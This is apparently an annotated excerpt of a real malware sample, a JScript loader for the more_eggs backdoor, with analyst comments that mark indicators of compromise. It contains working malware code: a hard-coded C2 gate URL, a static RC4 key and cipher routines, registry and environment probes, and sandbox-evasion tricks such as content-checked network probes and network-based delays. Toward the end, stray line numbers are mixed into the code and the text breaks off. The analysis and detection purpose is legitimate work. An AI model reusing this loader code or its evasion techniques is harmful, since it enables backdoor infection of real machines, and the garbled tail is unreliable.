// sample from SHA256: e9a6a275d20b73605c7af7c48140baeff0258b185a315a6beb54d373740a8b14
// signed malware install loader -> JS "Terra Loader", a.k.a. the more_eggs backdoor (JScript stage, runs under Windows Script Host)
// h/t @malwarehunterteam
function anonymous() {
// ---- Loader configuration. Every value is hard-coded in the sample; the
// ---- items marked IOC are directly usable for hunting/detection.
var BV = "6.1"; // loader build/version tag (presumably reported to the C2 — confirm in main(), which is outside this excerpt)
var Gate = "https://report.monicabellucci.kz/295693495/info"; // IOC: C2 gate URL
var hit_each = 10; // check-in period knob; units are not visible here (presumably minutes, cf. waitfor() taking minutes)
var error_retry = 2; // retry budget after a failed check-in — consumer not visible in this excerpt
var restart_h = 4; // restart window in hours; only feeds rcon_max below
var rcon_max = hit_each * (restart_h * 60) / (hit_each * hit_each); // simplifies to restart_h*60/hit_each, i.e. 24 with these constants
var Rkey = "ltgjjhh6iogejlaDKFgdf"; // IOC: static RC4 key consumed by zzzzz4()/zzz4Bytes(); captured traffic keyed with it can be decrypted offline
var rcon_now = 0; // reconnect attempts so far (presumably compared against rcon_max in main() — confirm)
var gtfo = false; // exit flag; the name suggests it is set by a C2 command — confirm in the part of the sample not shown here
var selfdel = false; // self-delete flag; consumer not visible in this excerpt
var table = [];
var Build = "";
var PCN = ""; // computer-name placeholder, filled outside this excerpt
var UNM = ""; // user-name placeholder, filled outside this excerpt
var SYSTEM = 0;
var rootK = "HKCU"; // registry hive used by the loader; HKCU needs no elevation
var workingDir = "";
var main_mitm = "";
var xApp = "";
var xTmp = "";
var PreserveH = "";
var xStore = "";
var set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&()*+,./:;<=>?@[]^_`{|}~"'; // printable-ASCII alphabet (letters, digits, most punctuation); consumer not visible in this excerpt
// Thin wrapper over COM instantiation. This only works under the Windows Script
// Host JScript engine (wscript.exe/cscript.exe) — ActiveXObject does not exist in
// browsers or Node — which by itself rules out most non-WSH analysis harnesses.
function obj(xString) {
  return new ActiveXObject(xString); // throws if the ProgID is not registered on the host
}
// HTTP client objects created up front. `con` is an Msxml2.XMLHTTP instance;
// `xhr` is the ServerXMLHTTP variant, which is the one that accepts
// setTimeouts() in fuck_js() below. The newest ProgID is tried first and older
// ones are fallen back to so the loader also runs on old Windows builds.
var con;
try {
  con = obj("Msxml2.XMLHTTP.6.0");
} catch (e) {
  try {
    con = obj("Msxml2.XMLHTTP.3.0");
  } catch (e2) {
    con = obj("Microsoft.XMLHTTP"); // last resort; if this throws there is no further catch and the script dies here
  }
}
var xhr;
try {
  xhr = obj("Msxml2.ServerXMLHTTP.6.0");
} catch (e3) {
  xhr = obj("Msxml2.ServerXMLHTTP.3.0"); // no further fallback
}
// Internet-reachability probe with a content check: synchronously GETs a fixed
// w3.org URL and reports success only when the body is exactly the expected
// text. A sandbox that fakes HTTP with canned 200 responses fails the string
// compare, so this doubles as an analysis-environment check.
//   method 0 -> use `con` (XMLHTTP) and fall back to method 1 on error
//   method 1 -> use `xhr` (ServerXMLHTTP) and give up on error
// Returns true/false.
// Detection hint: wscript.exe fetching http://www.w3.org/1999/XSL/Format.
function check_Net(method) {
  var Resp = false;
  var conz1;
  var t11 = "";
  if (method === 1) {
    conz1 = xhr;
  } else {
    conz1 = con;
  }
  try {
    conz1.open("GET", "http://www.w3.org/1999/XSL/Format", false); // async=false: send() blocks until the response arrives
  } catch (e1) {
    if (method === 0) {
      return check_Net(1); // retry once over the other transport
    } else {
      return false;
    }
  }
  conz1.onreadystatechange = function() {
    if (conz1.readyState === 4) {
      if (conz1.status === 200) {
        t11 = conz1.responseText;
        if (t11) {
          if (t11 == 'This is another XSL namespace\n') { // exact body match including the trailing LF; == on two strings behaves like === here
            Resp = true;
          } else {
            Resp = false;
          }
        } else {
          Resp = false;
        }
      } else {
        Resp = false;
      }
    }
  };
  try {
    conz1.send(); // synchronous send; presumably the handler above has fired by the time this returns — verify against MSXML behaviour
  } catch (e2) {
    if (method === 0) {
      return check_Net(1);
    } else {
      return false;
    }
  }
  return Resp; // stays false if readyState never reached 4 or the handler was not invoked
}
// Length gate: true when mstr has between min and max characters (inclusive),
// false for the empty string. Quirk kept from the original: a non-empty string
// outside the range yields undefined (the original falls off the end), not
// false — truthiness checks still read it as "no".
function cLength(mstr, min, max) {
  var count = mstr.length;
  if (count === 0) {
    return false;
  }
  var inRange = (count >= min) && (count <= max);
  if (!inRange) {
    return undefined;
  }
  return true;
}
// Integer in [ceil(min), floor(max)] drawn from Math.random(). Not a CSPRNG —
// in this sample it only jitters the random path length used by fuck_js().
// If the rounded bounds cross (e.g. rInt(2.2, 2.9)) the span is 0 and the
// lower bound is returned.
function rInt(min, max) {
  var lo = Math.ceil(min);
  var hi = Math.floor(max);
  var span = hi - lo + 1;
  return lo + Math.floor(Math.random() * span);
}
// Random [A-Za-z0-9] string of `len` characters built from Math.random() (not
// cryptographic). Quirks preserved from the original do/while: any len <= 1
// (including 0, negatives and NaN) still yields exactly one character, and a
// fractional len is effectively rounded up.
function rStr(len) {
  var alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  var out = "";
  var want = len > 1 ? len : 1;
  var k;
  for (k = 0; k < want; k += 1) {
    out += alphabet.charAt(Math.floor(Math.random() * alphabet.length));
  }
  return out;
}
// Time-burning helper used as a sleep substitute by waitfor()/waitfor2(): one
// blocking GET to http://8.8.8.8/<8-32 random alphanumerics> with 5 s resolve /
// connect and 10 s send / receive timeouts, so each call costs network round-trip
// or timeout time. Avoiding WScript.Sleep presumably sidesteps sandboxes that
// fast-forward sleeps — the request result is never looked at.
// Detection hint: repeated HTTP GETs to 8.8.8.8:80 with random paths from a
// script host. Returns false on exception, otherwise undefined.
function fuck_js() {
  var xNow = rInt(8, 32);
  var rNow = rStr(xNow);
  try {
    xhr.setTimeouts(5000, 5000, 10000, 10000); // resolve, connect, send, receive (ms)
    xhr.open("GET", "http://8.8.8.8/" + rNow, false); // synchronous
    xhr.send();
  } catch (e9) {
    return false; // timeouts / refused connections land here; callers ignore the value
  }
}
// Busy-waits zMinute minutes by looping fuck_js() (network-bound delay instead
// of WScript.Sleep), then re-enters main(). main() is outside this excerpt; if
// it calls waitfor() again, each cycle adds a stack frame rather than returning.
// Date.parse(Date()) parses the current time's string form (whole-second resolution).
function waitfor(zMinute) {
  var limit = Date.parse(Date()) + (zMinute * 60000);
  while (Date.parse(Date()) < limit) {
    fuck_js();
  }
  main();
}
// Same network-bound busy-wait as waitfor(), but the follow-up is optional:
// go() is called only when iGo === 1. go() is not visible in this excerpt.
function waitfor2(zMinute, iGo) {
  var xlmt;
  xlmt = Date.parse(Date()) + (zMinute * 60000); // deadline in ms, whole-second resolution
  while (Date.parse(Date()) < xlmt) {
    fuck_js();
  }
  if (iGo === 1) {
    go();
  }
}
// True iff xpath names an existing file (Scripting.FileSystemObject.FileExists).
// Any COM error — FSO blocked, malformed path — is swallowed and reported as
// "absent", so a hardened host that denies FSO looks like "file missing" here.
function fexist(xpath) {
  var fso;
  try {
    fso = obj("Scripting.FileSystemObject");
    if (fso.FileExists(xpath)) {
      return true;
    } else {
      return false;
    }
  } catch (feer) {
    return false;
  }
}
// Registry probe: true when WScript.Shell.RegRead(xpath) returns a non-null
// value. RegRead throws for a missing key/value, which the catch maps to false;
// the `rdata === null` path falls off the end (undefined, falsy), so callers
// effectively get a boolean. xpath is a full path such as "HKCU\..." — callers
// are outside this excerpt.
function rexist(xpath) {
  var sh;
  var rdata;
  try {
    sh = obj("Wscript.shell");
    rdata = sh.RegRead(xpath);
    if (rdata !== null) {
      return true;
    }
  } catch (e71) {
    return false;
  }
}
// Reads environment variable xVar through WScript.Shell.Environment: the
// machine-wide "SYSTEM" block when xSystem === 1, otherwise the current
// "PROCESS" block. Returns the raw string (empty when unset).
function myEnv(xVar, xSystem) {
  var a1;
  var rEnv;
  a1 = obj("WScript.Shell");
  if (xSystem === 1) {
    rEnv = a1.environment("SYSTEM");
  } else {
    rEnv = a1.environment("PROCESS");
  }
  return rEnv(xVar); // WshEnvironment is indexed like a function in JScript
}
// OS bitness from the SYSTEM-scope PROCESSOR_ARCHITECTURE: "64" for AMD64,
// otherwise "86". Reading the SYSTEM block instead of PROCESS presumably avoids
// the WoW64 view a 32-bit script host would report (x86) — confirm. Any other
// value (e.g. ARM64) also lands in "86".
function myBits() {
  var xBits;
  xBits = myEnv("PROCESSOR_ARCHITECTURE", 1);
  if (xBits === "AMD64") {
    return "64";
  } else {
    return "86";
  }
}
// RC4 over a JS string: XORs each UTF-16 code unit of `str` with the RC4
// keystream derived from `key` and returns the result as a string. RC4 is
// symmetric, so the same call encrypts and decrypts; in this sample it is
// keyed with the static Rkey, which means captured traffic is recoverable
// offline. Returns "" when either argument is falsy (empty key or empty text).
function zzzz4(key, str) {
  if (!key || !str) {
    return "";
  }
  var S = [];
  var a;
  var b = 0;
  var swap;
  var out = "";
  var pos;
  // Key-scheduling: identity permutation, then key-driven swaps.
  for (a = 0; a < 256; a += 1) {
    S[a] = a;
  }
  for (a = 0; a < 256; a += 1) {
    b = (b + S[a] + key.charCodeAt(a % key.length)) % 256;
    swap = S[a];
    S[a] = S[b];
    S[b] = swap;
  }
  // Keystream generation, one byte per input code unit.
  a = 0;
  b = 0;
  for (pos = 0; pos < str.length; pos += 1) {
    a = (a + 1) % 256;
    b = (b + S[a]) % 256;
    swap = S[a];
    S[a] = S[b];
    S[b] = swap;
    out += String.fromCharCode(str.charCodeAt(pos) ^ S[(S[a] + S[b]) % 256]);
  }
  return out;
}
// RC4 over a byte array: returns a new array of xArray XOR keystream(key).
// Same KSA/PRGA as zzzz4(); symmetric, so it encrypts and decrypts. Returns []
// when key or xArray is falsy. Quirk preserved from the original: an empty
// array is truthy, passes the guard, and the do/while still emits one element
// (undefined ^ k === k, i.e. the first keystream byte).
function zzz4Bytes(xArray, key) {
  var out = [];
  if (!(key && xArray)) {
    return out;
  }
  var S = [];
  var a;
  var b = 0;
  var swap;
  for (a = 0; a < 256; a += 1) {
    S[a] = a;
  }
  for (a = 0; a < 256; a += 1) {
    b = (b + S[a] + key.charCodeAt(a % key.length)) % 256;
    swap = S[a];
    S[a] = S[b];
    S[b] = swap;
  }
  a = 0;
  b = 0;
  var pos = 0;
  do {
    a = (a + 1) % 256;
    b = (b + S[a]) % 256;
    swap = S[a];
    S[a] = S[b];
    S[b] = swap;
    out.push(xArray[pos] ^ S[(S[a] + S[b]) % 256]);
    pos += 1;
  } while (pos < xArray.length);
  return out;
}
// Unicode string -> array of CP437 (IBM PC / OEM US) byte values. Code units
// below 128 pass through; the upper half is mapped through the CP437 table
// below; anything not in CP437 becomes undefined (no substitution). Quirk
// preserved from the original do/while: an empty string yields [undefined].
// The table lists the Unicode code point for each CP437 byte 0x80..0xFF in
// order, and the reverse map is built from it on every call like the original.
function tB(htc) {
  var cp437High = [
    0x00C7, 0x00FC, 0x00E9, 0x00E2, 0x00E4, 0x00E0, 0x00E5, 0x00E7, // 0x80-0x87
    0x00EA, 0x00EB, 0x00E8, 0x00EF, 0x00EE, 0x00EC, 0x00C4, 0x00C5, // 0x88-0x8F
    0x00C9, 0x00E6, 0x00C6, 0x00F4, 0x00F6, 0x00F2, 0x00FB, 0x00F9, // 0x90-0x97
    0x00FF, 0x00D6, 0x00DC, 0x00A2, 0x00A3, 0x00A5, 0x20A7, 0x0192, // 0x98-0x9F
    0x00E1, 0x00ED, 0x00F3, 0x00FA, 0x00F1, 0x00D1, 0x00AA, 0x00BA, // 0xA0-0xA7
    0x00BF, 0x2310, 0x00AC, 0x00BD, 0x00BC, 0x00A1, 0x00AB, 0x00BB, // 0xA8-0xAF
    0x2591, 0x2592, 0x2593, 0x2502, 0x2524, 0x2561, 0x2562, 0x2556, // 0xB0-0xB7
    0x2555, 0x2563, 0x2551, 0x2557, 0x255D, 0x255C, 0x255B, 0x2510, // 0xB8-0xBF
    0x2514, 0x2534, 0x252C, 0x251C, 0x2500, 0x253C, 0x255E, 0x255F, // 0xC0-0xC7
    0x255A, 0x2554, 0x2569, 0x2566, 0x2560, 0x2550, 0x256C, 0x2567, // 0xC8-0xCF
    0x2568, 0x2564, 0x2565, 0x2559, 0x2558, 0x2552, 0x2553, 0x256B, // 0xD0-0xD7
    0x256A, 0x2518, 0x250C, 0x2588, 0x2584, 0x258C, 0x2590, 0x2580, // 0xD8-0xDF
    0x03B1, 0x00DF, 0x0393, 0x03C0, 0x03A3, 0x03C3, 0x00B5, 0x03C4, // 0xE0-0xE7
    0x03A6, 0x0398, 0x03A9, 0x03B4, 0x221E, 0x03C6, 0x03B5, 0x2229, // 0xE8-0xEF
    0x2261, 0x00B1, 0x2265, 0x2264, 0x2320, 0x2321, 0x00F7, 0x2248, // 0xF0-0xF7
    0x00B0, 0x2219, 0x00B7, 0x221A, 0x207F, 0x00B2, 0x25A0, 0x00A0  // 0xF8-0xFF
  ];
  var toByte = [];
  var k;
  for (k = 0; k < cp437High.length; k += 1) {
    toByte[cp437High[k]] = 0x80 + k;
  }
  var bytes = [];
  var idx = 0;
  var unit;
  do {
    unit = htc.charCodeAt(idx);
    bytes.push(unit < 128 ? unit : toByte[unit]);
    idx += 1;
  } while (idx < htc.length);
  return bytes;
}
function tS(arenderer) {
432
var x = [];
433
x[0x80] = 0x00C7;
434
x[0x81] = 0x00FC;
435
x[0x82] = 0x00E9;
436
x[0x83] = 0x00E2;
437
x[0x84] = 0x00E4;
438
x[0x85] = 0x00E0;
439
x[0x86] = 0x00E5;
440
x[0x87] = 0x00E7;
441
x[0x88] = 0x00EA;
442
x[0x89] = 0x00EB;
443
x[0x8A] = 0x00E8;
444
x[0x8B] = 0x00EF;
445
x[0x8C] = 0x00EE;
446
x[0x8D] = 0x00EC;
447
x[0x8E] = 0x00C4;
448
x[0x8F] = 0x00C5;
449
x[0x90] = 0x00C9;
450
x[0x91] = 0x00E6;
451
x[0x92] = 0x00C6;
452
x[0x93] = 0x00F4;
453
x[0x94] = 0x00F6;
454
x[0x95] = 0x00F2;
455
x[0x96] = 0x00FB;
456
x[0x97] = 0x00F9;
457
x[0x98] = 0x00FF;
458
x[0x99] = 0x00D6;
459
x[0x9A] = 0x00DC;
460
x[0x9B] = 0x00A2;
461
x[0x9C] = 0x00A3;
462
x[0x9D] = 0x00A5;
463
x[0x9E] = 0x20A7;
464
x[0x9F] = 0x0192;
465
x[0xA0] = 0x00E1;
466
x[0xA1] = 0x00ED;
467
x[0xA2] = 0x00F3;
468
x[0xA3] = 0x00FA;
469
x[0xA4] = 0x00F1;
470
x[0xA5] = 0x00D1;
471
x[0xA6] = 0x00AA;
472
x[0xA7] = 0x00BA;
473
x[0xA8] = 0x00BF;
474
x[0xA9] = 0x2310;
475
x[0xAA] = 0x00AC;
476
x[0xAB] = 0x00BD;
477
x[0xAC] = 0x00BC;
478
x[0xAD] = 0x00A1;
479
x[0xAE] = 0x00AB;
480
x[0xAF] = 0x00BB;
481
x[0xB0] = 0x2591;
482
x[0xB1] = 0x2592;
483
x[0xB2] = 0x2593;
484
x[0xB3] = 0x2502;
485
x[0xB4] = 0x2524;
486
x[0xB5] = 0x2561;
487
x[0xB6] = 0x2562;
488
x[0xB7] = 0x2556;
489
x[0xB8] = 0x2555;
490
x[0xB9] = 0x2563;
491
x[0xBA] = 0x2551;
492
x[0xBB] = 0x2557;
493
x[0xBC] = 0x255D;
494
x[0xBD] = 0x255C;
495
x[0xBE] = 0x255B;
496
x[0xBF] = 0x2510;
497
x[0xC0] = 0x2514;
498
x[0xC1] = 0x2534;
499
x[0xC2] = 0x252C;
500
x[0xC3] = 0x251C;
501
x[0xC4] = 0x2500;
502
x[0xC5] = 0x253C;
503
x[0xC6] = 0x255E;
504
x[0xC7] = 0x255F;
505
x[0xC8] = 0x255A;
506
x[0xC9] = 0x2554;
507
x[0xCA] = 0x2569;
508
x[0xCB] = 0x2566;
509
x[0xCC] = 0x2560;
510
x[0xCD] = 0x2550;
511
x[0xCE] = 0x256C;
512
x[0xCF] = 0x2567;
513
x[0xD0] = 0x2568;
514
x[0xD1] = 0x2564;
515
x[0xD2] = 0x2565;
516
...
///